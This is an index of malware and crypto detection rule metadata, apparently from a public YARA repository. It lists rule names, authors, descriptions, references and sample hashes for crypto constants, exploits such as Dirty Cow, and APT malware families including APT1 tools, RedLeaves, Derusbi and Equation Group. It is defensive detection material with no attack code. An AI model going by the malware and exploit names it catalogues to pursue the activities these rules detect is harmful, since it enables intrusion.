crypto_index Big_Numbers1 author: _pusher_ description: Looks for big numbers 32:sized date: 2016-07
crypto_index Big_Numbers2 author: _pusher_ description: Looks for big numbers 48:sized date: 2016-07
crypto_index Big_Numbers3 author: _pusher_ description: Looks for big numbers 64:sized date: 2016-07
crypto_index Prime_Constants_char author: _pusher_ description: List of primes [char] date: 2016-07
crypto_index Prime_Constants_long author: _pusher_ description: List of primes [long] date: 2016-07
crypto_index Advapi_Hash_API author: _pusher_ description: Looks for advapi API functions date: 2016-07
crypto_index Crypt32_CryptBinaryToString_API author: _pusher_ description: Looks for crypt32 CryptBinaryToStringA function date: 2016-08
crypto_index CRC32c_poly_Constant author: _pusher_ description: Look for CRC32c (Castagnoli) [poly] date: 2016-08
crypto_index CRC32_poly_Constant author: _pusher_ description: Look for CRC32 [poly] date: 2015-05 version: 0.1
crypto_index CRC32_table author: _pusher_ description: Look for CRC32 table date: 2015-05 version: 0.1
crypto_index CRC32_table_lookup author: _pusher_ description: CRC32 table lookup date: 2015-06 version: 0.1
crypto_index CRC32b_poly_Constant author: _pusher_ description: Look for CRC32b [poly] date: 2016-04 version: 0.1
crypto_index CRC16_table author: _pusher_ description: Look for CRC16 table date: 2016-04 version: 0.1
crypto_index FlyUtilsCnDES_ECB_Encrypt author: _pusher_ description: Look for FlyUtils.CnDES Encrypt ECB function date: 2016-07
crypto_index FlyUtilsCnDES_ECB_Decrypt author: _pusher_ description: Look for FlyUtils.CnDES Decrypt ECB function date: 2016-07
crypto_index Elf_Hash author: _pusher_ description: Look for ElfHash date: 2015-06 version: 0.3
crypto_index BLOWFISH_Constants author: phoul (@phoul) description: Look for Blowfish constants date: 2014-01 version: 0.1
crypto_index MD5_Constants author: phoul (@phoul) description: Look for MD5 constants date: 2014-01 version: 0.2
crypto_index MD5_API author: _pusher_ description: Looks for MD5 API date: 2016-07
crypto_index RC6_Constants author: chort (@chort0) description: Look for RC6 magic constants in binary reference: https://twitter.com/mikko/status/417620511397400576 reference2: https://twitter.com/dyngnosis/status/418105168517804033 date: 2013-12 version: 0.2
crypto_index RIPEMD160_Constants author: phoul (@phoul) description: Look for RIPEMD-160 constants date: 2014-01 version: 0.1
crypto_index SHA1_Constants author: phoul (@phoul) description: Look for SHA1 constants date: 2014-01 version: 0.1
crypto_index SHA512_Constants author: phoul (@phoul) description: Look for SHA384/SHA512 constants date: 2014-01 version: 0.1
crypto_index TEAN author: _pusher_ description: Look for TEA Encryption date: 2016-08
crypto_index WHIRLPOOL_Constants author: phoul (@phoul) description: Look for WhirlPool constants date: 2014-02 version: 0.1
crypto_index DarkEYEv3_Cryptor description: Rule to detect DarkEYEv3 encrypted executables (often malware) author: Florian Roth reference: http://darkeyev3.blogspot.fi/ date: 2015-05-24 hash0: 6b854b967397f7de0da2326bdd5d39e710e2bb12 hash1: d53149968eca654fc0e803f925e7526fdac2786c hash2: 7e3a8940d446c57504d6a7edb6445681cca31c65 hash3: d3dd665dd77b02d7024ac16eb0949f4f598299e7 hash4: a907a7b74a096f024efe57953c85464e87275ba3 hash5: b1c422155f76f992048377ee50c79fe164b22293 hash6: 29f5322ce5e9147f09e0a86cc23a7c8dc88721b9 hash7: a0382d7c12895489cb37efef74c5f666ea750b05 hash8: f3d5b71b7aeeb6cc917d5bb67e2165cf8a2fbe61 score: 55
crypto_index Miracl_powmod author: Maxx description: Miracl powmod
crypto_index Miracl_crt author: Maxx description: Miracl crt
crypto_index CryptoPP_a_exp_b_mod_c author: Maxx description: CryptoPP a_exp_b_mod_c
crypto_index CryptoPP_modulo author: Maxx description: CryptoPP modulo
crypto_index FGint_MontgomeryModExp author: _pusher_ date: 2015-06 version: 0.2 description: FGint MontgomeryModExp
crypto_index FGint_FGIntModExp author: _pusher_ date: 2015-05 description: FGint FGIntModExp
crypto_index FGint_MulByInt author: _pusher_ date: 2015-05 description: FGint MulByInt
crypto_index FGint_DivMod author: _pusher_ date: 2015-05 description: FGint FGIntDivMod
crypto_index FGint_FGIntDestroy author: _pusher_ date: 2015-05 description: FGint FGIntDestroy
crypto_index FGint_Base10StringToGInt author: _pusher_ date: 2015-06 version: 0.2 description: FGint Base10StringToGInt
crypto_index FGint_ConvertBase256to64 author: _pusher_ date: 2015-05 description: FGint ConvertBase256to64
crypto_index FGint_ConvertHexStringToBase256String author: _pusher_ date: 2015-06 version: 0.2 description: FGint ConvertHexStringToBase256String
crypto_index FGint_Base256StringToGInt author: _pusher_ date: 2015-05 description: FGint Base256StringToGInt
crypto_index FGint_FGIntToBase256String author: _pusher_ date: 2015-06 version: 0.2 description: FGint FGIntToBase256String
crypto_index FGint_ConvertBase256StringToHexString author: _pusher_ date: 2015-05 description: FGint ConvertBase256StringToHexString
crypto_index FGint_PGPConvertBase256to64 author: _pusher_ date: 2016-08 description: FGint PGPConvertBase256to64
crypto_index FGint_RSAEncrypt author: _pusher_ date: 2015-05 description: FGint RSAEncrypt
crypto_index FGint_RsaDecrypt author: Maxx description: FGint RsaDecrypt
crypto_index FGint_RSAVerify author: _pusher_ description: FGint RSAVerify
crypto_index FGint_FindPrimeGoodCurveAndPoint author: _pusher_ date: 2015-06 description: FGint FindPrimeGoodCurveAndPoint version: 0.1
crypto_index FGint_ECElGamalEncrypt author: _pusher_ date: 2016-08 description: FGint ECElGamalEncrypt version: 0.1
crypto_index FGint_ECAddPoints author: _pusher_ date: 2015-06 description: FGint ECAddPoints version: 0.1
crypto_index FGint_ECPointKMultiple author: _pusher_ date: 2015-06 description: FGint ECPointKMultiple version: 0.1
crypto_index FGint_ECPointDestroy author: _pusher_ date: 2015-06 description: FGint ECPointDestroy version: 0.1
crypto_index FGint_DSAPrimeSearch author: _pusher_ date: 2016-08 description: FGint DSAPrimeSearch version: 0.1
crypto_index FGint_DSASign author: _pusher_ date: 2016-08 description: FGint DSASign version: 0.1
crypto_index FGint_DSAVerify author: _pusher_ date: 2016-08 description: FGint DSAVerify version: 0.1
crypto_index DES_Long author: _pusher_ date: 2015-05 description: DES [long]
crypto_index DES_sbox author: _pusher_ date: 2015-05 description: DES [sbox]
crypto_index DES_pbox_long author: _pusher_ date: 2015-05 description: DES [pbox] [long]
crypto_index OpenSSL_BN_mod_exp2_mont author: Maxx description: OpenSSL BN_mod_exp2_mont
crypto_index OpenSSL_BN_mod_exp_mont author: Maxx description: OpenSSL BN_mod_exp_mont
crypto_index OpenSSL_BN_mod_exp_recp author: Maxx description: OpenSSL BN_mod_exp_recp
crypto_index OpenSSL_BN_mod_exp_simple author: Maxx description: OpenSSL BN_mod_exp_simple
crypto_index OpenSSL_BN_mod_exp_inverse author: Maxx description: OpenSSL BN_mod_exp_inverse
crypto_index OpenSSL_DSA author: _pusher_ date: 2016-08
crypto_index FGint_RsaSign author: Maxx description: FGint RsaSign
crypto_index LockBox_RsaEncryptFile author: Maxx description: LockBox RsaEncryptFile
crypto_index LockBox_DecryptRsaEx author: Maxx description: LockBox DecryptRsaEx
crypto_index LockBox_EncryptRsaEx author: Maxx description: LockBox EncryptRsaEx
crypto_index LockBox_TlbRsaKey author: Maxx description: LockBox TlbRsaKey
crypto_index BigDig_bpInit author: Maxx description: BigDig bpInit
crypto_index BigDig_mpModExp author: Maxx description: BigDig mpModExp
crypto_index BigDig_mpModInv author: Maxx description: BigDig mpModInv
crypto_index BigDig_mpModMult author: Maxx description: BigDig mpModMult
crypto_index BigDig_mpModulo author: Maxx description: BigDig mpModulo
crypto_index BigDig_spModExpB author: Maxx description: BigDig spModExpB
crypto_index BigDig_spModInv author: Maxx description: BigDig spModInv
crypto_index BigDig_spModMult author: Maxx description: BigDig spModMult
crypto_index CryptoPP_ApplyFunction author: Maxx description: CryptoPP ApplyFunction
crypto_index CryptoPP_RsaFunction author: Maxx description: CryptoPP RsaFunction
crypto_index CryptoPP_Integer_constructor author: Maxx description: CryptoPP Integer constructor
crypto_index RijnDael_AES author: _pusher_ description: RijnDael AES date: 2016-06
crypto_index RijnDael_AES_CHAR author: _pusher_ description: RijnDael AES (check2) [char] date: 2016-06
crypto_index RijnDael_AES_CHAR_inv author: _pusher_ description: RijnDael AES S-inv [char] date: 2016-07
crypto_index RijnDael_AES_LONG author: _pusher_ description: RijnDael AES date: 2016-06
crypto_index RsaRef2_NN_modExp author: Maxx description: RsaRef2 NN_modExp
crypto_index RsaRef2_NN_modInv author: Maxx description: RsaRef2 NN_modInv
crypto_index RsaRef2_NN_modMult author: Maxx description: RsaRef2 NN_modMult
crypto_index RsaRef2_RsaPrivateDecrypt author: Maxx description: RsaRef2 RsaPrivateDecrypt
crypto_index RsaRef2_RsaPrivateEncrypt author: Maxx description: RsaRef2 RsaPrivateEncrypt
crypto_index RsaRef2_RsaPublicDecrypt author: Maxx description: RsaRef2 RsaPublicDecrypt
crypto_index RsaRef2_RsaPublicEncrypt author: Maxx description: RsaRef2 RsaPublicEncrypt
crypto_index RsaEuro_NN_modInv author: Maxx description: RsaEuro NN_modInv
crypto_index RsaEuro_NN_modMult author: Maxx description: RsaEuro NN_modMult
crypto_index Miracl_Big_constructor author: Maxx description: Miracl Big constructor
crypto_index Miracl_mirvar author: Maxx description: Miracl mirvar
crypto_index Miracl_mirsys_init author: Maxx description: Miracl mirsys init
crypto_index BASE64_table author: _pusher_ description: Look for Base64 table date: 2015-07 version: 0.1
crypto_index Delphi_Random author: _pusher_ description: Look for Random function date: 2015-08 version: 0.1
crypto_index Delphi_RandomRange author: _pusher_ description: Look for RandomRange function date: 2016-06 version: 0.1
crypto_index Delphi_FormShow author: _pusher_ description: Look for Form.Show function date: 2016-06 version: 0.1
crypto_index Delphi_CompareCall author: _pusher_ description: Look for Compare string function date: 2016-07
crypto_index Delphi_Copy author: _pusher_ description: Look for Copy function date: 2016-06 version: 0.1
crypto_index Delphi_IntToStr author: _pusher_ description: Look for IntToStr function date: 2016-04 version: 0.1
crypto_index Delphi_StrToInt author: _pusher_ description: Look for StrToInt function date: 2016-06 version: 0.1
crypto_index Delphi_DecodeDate author: _pusher_ description: Look for DecodeDate (DecodeDateFully) function date: 2016-06 version: 0.1
crypto_index Unknown_Random author: _pusher_ description: Look for Random function date: 2016-07
crypto_index VC6_Random author: _pusher_ description: Look for Random function date: 2016-02
crypto_index VC8_Random author: _pusher_ description: Look for Random function date: 2016-01 version: 0.1
crypto_index DCP_RIJNDAEL_Init author: _pusher_ description: Look for DCP RijnDael Init date: 2016-07
crypto_index DCP_RIJNDAEL_EncryptECB author: _pusher_ description: Look for DCP RijnDael EncryptECB date: 2016-07
crypto_index DCP_BLOWFISH_Init author: _pusher_ description: Look for DCP Blowfish Init date: 2016-07
crypto_index DCP_BLOWFISH_EncryptCBC author: _pusher_ description: Look for DCP Blowfish EncryptCBC date: 2016-07
crypto_index DCP_DES_Init author: _pusher_ description: Look for DCP Des Init date: 2016-02
crypto_index DCP_DES_EncryptECB author: _pusher_ description: Look for DCP Des EncryptECB date: 2016-02
cve_rules_index cve_2013_0074 author: Kaspersky Lab filetype: Win32 EXE date: 2015-07-23 version: 1.0
cve_rules_index Exploit_MS15_077_078 description: MS15-078 / MS15-077 exploit - generic signature author: Florian Roth reference: https://code.google.com/p/google-security-research/issues/detail?id=473&can=1&start=200 date: 2015-07-21 hash1: 18e3e840a5e5b75747d6b961fca66a670e3faef252aaa416a88488967b47ac1c hash2: 0b5dc030e73074b18b1959d1cf7177ff510dbc2a0ec2b8bb927936f59eb3d14d hash3: fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9 hash4: ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15
cve_rules_index Mal_http_EXE description: Detects trojan from APT report named http.exe author: Florian Roth reference: https://goo.gl/13Wgy1 date: 2016-05-25 score: 80 hash1: ad191d1d18841f0c5e48a5a1c9072709e2dd6359a6f6d427e0de59cfcd1d9666
cve_rules_index Linux_DirtyCow_Exploit description: Detects Linux Dirty Cow Exploit - CVE-2012-0056 and CVE-2016-5195 author: Florian Roth reference: http://dirtycow.ninja/ date: 2016-10-21
malware_index LIGHTDART_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index AURIGA_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index BANGAT_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index BISCUIT_GREENCAT_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index BOUNCER_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index BOUNCER_DLL_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index CALENDAR_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index COMBOS_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index DAIRY_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index GLOOXMAIL_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index GOGGLES_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index HACKSFASE1_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index HACKSFASE2_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index KURTON_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index MACROMAIL_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index MANITSME_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index MINIASP_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index NEWSREELS_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index SEASALT_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index STARSYPOUND_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index SWORD_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index thequickbrow_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index TABMSGSQL_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index CCREWBACK1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index TrojanCookies_CCREW author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index GEN_CCREW1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index Elise author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index EclipseSunCloudRAT author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index MoonProject author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewDownloader1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewDownloader2 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewMiniasp author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewSSLBack2 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewSSLBack3 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewSSLBack1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewDownloader3 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewQAZ author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index metaxcd author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index MiniASP author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index DownloaderPossibleCCrew author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_LIGHTBOLT author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_GETMAIL author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_GDOCUPLOAD author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_Y21K author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_YAHOO author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_UGX author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_TOCK author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_RAVE author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_QBP author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_HEAD author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_GREENCAT author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_DIV author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_CSON author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_CLOVER author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_BOLID author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_ADSPACE author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_AUSOV author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WARP author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_TARSIP_ECLIPSE author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_TARSIP_MOON author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_RARSilent_EXE_PDF author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_aspnetreport author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_Revird_svc author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_dbg_mess author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_known_malicious_RARSilent author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief description: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT author: USG true_positive: fb0c714cd2ebdcc6f33817abe7813c36 reference: https://www.us-cert.gov/ncas/alerts/TA17-117A
malware_index REDLEAVES_CoreImplant_UniqueStrings description: Strings identifying the core REDLEAVES RAT in its deobfuscated state author: USG reference: https://www.us-cert.gov/ncas/alerts/TA17-117A
malware_index PLUGX_RedLeaves author: US-CERT Code Analysis Team date: 2017/04/03 incident: 10118538 MD5_1: 598FF82EA4FB52717ACAFB227C83D474 MD5_2: 7D10708A518B26CC8C3CBFBAA224E032 MD5_3: AF406D35C77B1E0DF17F839E36BCE630 MD5_4: 6EB9E889B091A5647F6095DCD4DE7C83 MD5_5: 566291B277534B63EAFC938CDAAB8A399E41AF7D info: Detects specific RedLeaves and PlugX binaries reference: https://www.us-cert.gov/ncas/alerts/TA17-117A
malware_index APT3102Code description: 3102 code features author: Seth Hardy last_modified: 2014-06-25
malware_index APT9002Code description: 9002 code features author: Seth Hardy last_modified: 2014-06-25
malware_index APT9002Strings description: 9002 Identifying Strings author: Seth Hardy last_modified: 2014-06-25
malware_index APT9002 description: 9002 author: Seth Hardy last_modified: 2014-06-25
malware_index FE_APT_9002 Author: FireEye Labs Date: 2013/11/10 Description: Strings inside Reference: Useful link
malware_index apt_backspace description: Detects APT backspace author: Bit Byte Bitten date: 2015-05-14 hash: 6cbfeb7526de65eb2e3c848acac05da1e885636d17c1c45c62ad37e44cd84f99
malware_index APT_bestia author: Adam Ziaja <adam@adamziaja.com> http://adamziaja.com date: 2014-03-19 description: Bestia.3.02.012.07 malware used in APT attacks on Polish government references: http://zaufanatrzeciastrona.pl/post/ukierunkowany-atak-na-pracownikow-polskich-samorzadow/ hash0: 9bb03bb5af40d1202378f95a6485fba8 hash1: 7d9a806e0da0b869b10870dd6c7692c5 maltype: apt filetype: exe
malware_index apt_c16_win_memory_pcclient author: @dragonthreatlab md5: ec532bbe9d0882d403473102e9724557 description: File matching the md5 above tends to only live in memory, hence the lack of MZ header check. date: 2015/01/11 reference: http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html
malware_index apt_c16_win_swisyn author: @dragonthreatlab md5: a6a18c846e5179259eba9de238f67e41 description: File matching the md5 above tends to only live in memory, hence the lack of MZ header check. date: 2015/01/11 reference: http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html
malware_index apt_c16_win_wateringhole author: @dragonthreatlab description: Detects code from APT wateringhole date: 2015/01/11 reference: http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html
malware_index Careto_OSX_SBD author: AlienVault (Alberto Ortega) description: TheMask / Careto OSX component signature reference: www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf date: 2014/02/11
malware_index Careto_CnC author: AlienVault (Alberto Ortega) description: TheMask / Careto CnC communication signature reference: www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf date: 2014/02/11
malware_index Careto_CnC_domains author: AlienVault (Alberto Ortega) description: TheMask / Careto known command and control domains reference: www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf date: 2014/02/11
malware_index Casper_Included_Strings description: Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo author: Florian Roth reference: http://goo.gl/VRJNLo date: 2015/03/06 score: 50
malware_index Casper_SystemInformation_Output description: Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo author: Florian Roth reference: http://goo.gl/VRJNLo date: 2015/03/06 score: 70
malware_index Codoso_Gh0st_3 description: Detects Codoso APT Gh0st Malware author: Florian Roth reference: https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks date: 2016-01-30 hash: bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd
malware_index Codoso_Gh0st_1 description: Detects Codoso APT Gh0st Malware author: Florian Roth reference: https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks date: 2016-01-30 super_rule: 1 hash1: 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841 hash2: 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8 hash3: d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297
malware_index Codoso_PGV_PVID_3 description: Detects Codoso APT PGV PVID Malware author: Florian Roth reference: https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks date: 2016-01-30 super_rule: 1 hash1: 126fbdcfed1dfb31865d4b18db2fb963f49df838bf66922fea0c37e06666aee1 hash2: 13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75 hash3: 8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761 hash4: b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1 hash5: b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3 hash6: bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe
malware_index Codoso_PGV_PVID_1 description: Detects Codoso APT PGV PVID Malware author: Florian Roth reference: https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks date: 2016-01-30 super_rule: 1 hash1: 41a936b0d1fd90dffb2f6d0bcaf4ad0536f93ca7591f7b75b0cd1af8804d0824 hash2: 58334eb7fed37e3104d8235d918aa5b7856f33ea52a74cf90a5ef5542a404ac3 hash3: 934b87ddceabb2063b5e5bc4f964628fe0c63b63bb2346b105ece19915384fc7 hash4: ce91ea20aa2e6af79508dd0a40ab0981f463b4d2714de55e66d228c579578266 hash5: e770a298ae819bba1c70d0c9a2e02e4680d3cdba22d558d21caaa74e3970adf1
malware_index APT_DeputyDog_Fexel author: ThreatConnect Intelligence Research Team
malware_index APT_DeputyDog Author: FireEye Labs Date: 2013/09/21 Description: detects string seen in samples used in 2013-3893 0day attacks Reference: https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html
malware_index apt_win_exe_trojan_derusbi Author: @seifreed
malware_index Trojan_Derusbi Author: RSA_IR Date: 4Sept13 File: derusbi_variants v 1.3 MD5: c0d4c5b669cc5b51862db37e972d31ec
malware_index APT_Derusbi_DeepPanda author: ThreatConnect Intelligence Research Team reference: http://www.crowdstrike.com/sites/default/files/AdversaryIntelligenceReport_DeepPanda_0.pdf
malware_index APT_Derusbi_Gen author: ThreatConnect Intelligence Research Team
malware_index derusbi_kernel description: Derusbi Driver version date: 2015-12-09 author: Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud
malware_index apt_win32_dll_bergard_pgv_pvid_variant copyright: Fidelis Cybersecurity reference: http://www.threatgeek.com/2016/05/turbo-twist-two-64-bit-derusbi-strains-converge.html
malware_index Dubnium_Sample_SSHOpenSSL description: Detects sample mentioned in the Dubnium Report author: Florian Roth reference: https://goo.gl/AW9Cuu date: 2016-06-10 hash1: 6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b hash2: feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8 hash3: 41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf hash4: bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f hash5: a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9 hash6: e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b
malware_index EQGRP_create_dns_injection description: EQGRP Toolset Firewall - file create_dns_injection.py author: Florian Roth reference: Research date: 2016-08-16 hash1: 488f3cc21db0688d09e13eb85a197a1d37902612c3e302132c84e07bc42b1c32
malware_index EQGRP_tunnel_state_reader description: EQGRP Toolset Firewall - file tunnel_state_reader author: Florian Roth reference: Research date: 2016-08-16 hash1: 49d48ca1ec741f462fde80da68b64dfa5090855647520d29e345ef563113616c
malware_index EQGRP_eligiblecandidate description: EQGRP Toolset Firewall - file eligiblecandidate.py author: Florian Roth reference: Research date: 2016-08-16 hash1: c4567c00734dedf1c875ecbbd56c1561a1610bedb4621d9c8899acec57353d86
malware_index EQGRP_sniffer_xml2pcap description: EQGRP Toolset Firewall - file sniffer_xml2pcap author: Florian Roth reference: Research date: 2016-08-16 hash1: f5e5d75cfcd86e5c94b0e6f21bbac886c7e540698b1556d88a83cc58165b8e42
malware_index EQGRP_BananaAid description: EQGRP Toolset Firewall - file BananaAid author: Florian Roth reference: Research date: 2016-08-16 hash1: 7a4fb825e63dc612de81bc83313acf5eccaa7285afc05941ac1fef199279519f
malware_index EQGRP_shellcode description: EQGRP Toolset Firewall - file shellcode.py author: Florian Roth reference: Research date: 2016-08-16 hash1: ac9decb971dd44127a6ca0d35ac153951f0735bb4df422733046098eca8f8b7f
malware_index EQGRP_jetplow_SH description: EQGRP Toolset Firewall - file jetplow.sh author: Florian Roth reference: Research date: 2016-08-16 hash1: ee266f84a1a4ccf2e789a73b0a11242223ed6eba6868875b5922aea931a2199c
malware_index EQGRP_extrabacon description: EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py author: Florian Roth reference: Research date: 2016-08-16 hash1: 59d60835fe200515ece36a6e87e642ee8059a40cb04ba5f4b9cce7374a3e7735
malware_index EQGRP_sploit_py description: EQGRP Toolset Firewall - file sploit.py author: Florian Roth reference: Research date: 2016-08-16 hash1: 0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6
malware_index EQGRP_StoreFc description: EQGRP Toolset Firewall - file StoreFc.py author: Florian Roth reference: Research date: 2016-08-16 hash1: f155cce4eecff8598243a721389046ae2b6ca8ba6cb7b4ac00fd724601a56108
malware_index EQGRP_callbacks description: EQGRP Toolset Firewall - Callback addresses author: Florian Roth reference: Research date: 2016-08-16
malware_index EQGRP_Unique_Strings description: EQGRP Toolset Firewall - Unique strings author: Florian Roth reference: Research date: 2016-08-16
malware_index EQGRP_RC5_RC6_Opcode description: EQGRP Toolset Firewall - RC5 / RC6 opcode author: Florian Roth reference: https://securelist.com/blog/incidents/75812/the-equation-giveaway/ date: 2016-08-17
malware_index apt_equation_exploitlib_mutexes copyright: Kaspersky Lab description: Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW version: 1.0 last_modified: 2015-02-16 reference: http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/
malware_index apt_equation_equationlaser_runtimeclasses copyright: Kaspersky Lab description: Rule to detect the EquationLaser malware version: 1.0 last_modified: 2015-02-16 reference: https://securelist.com/blog/
malware_index apt_equation_cryptotable copyright: Kaspersky Lab description: Rule to detect the crypto library used in Equation group malware version: 1.0 last_modified: 2015-02-16 reference: https://securelist.com/blog/
malware_index apt_equation_keyword description: Rule to detect Equation group's keyword in executable file author: Florian Roth @4nc4p last_modified: 2015-09-26 reference: http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/
malware_index FVEY_ShadowBrokers_Jan17_Screen_Strings description: Detects strings derived from the ShadowBroker's leak of Windows tools/exploits author: Florian Roth reference: https://bit.no.com:43110/theshadowbrokers.bit/post/message7/ date: 2017-01-08
malware_index FiveEyes_QUERTY_Malwaresig_20123_cmdDef description: FiveEyes QUERTY Malware - file 20123_cmdDef.xml author: Florian Roth reference: http://www.spiegel.de/media/media-35668.pdf date: 2015/01/18 hash: 7b08fc77629f6caaf8cc4bb5f91be6b53e19a3cd
malware_index FiveEyes_QUERTY_Malwareqwerty_20123 description: FiveEyes QUERTY Malware - file 20123.xml author: Florian Roth reference: http://www.spiegel.de/media/media-35668.pdf date: 2015/01/18 hash: edc7228b2e27df9e7ff9286bddbf4e46adb51ed9
malware_index FiveEyes_QUERTY_Malwaresig_20120_dll description: FiveEyes QUERTY Malware - file 20120.dll.bin author: Florian Roth reference: http://www.spiegel.de/media/media-35668.pdf date: 2015/01/18 hash: 6811bfa3b8cda5147440918f83c40237183dbd25
malware_index FiveEyes_QUERTY_Malwaresig_20120_cmdDef description: FiveEyes QUERTY Malware - file 20120_cmdDef.xml author: Florian Roth reference: http://www.spiegel.de/media/media-35668.pdf date: 2015/01/18 hash: cda9ceaf0a39d6b8211ce96307302a53dfbd71ea
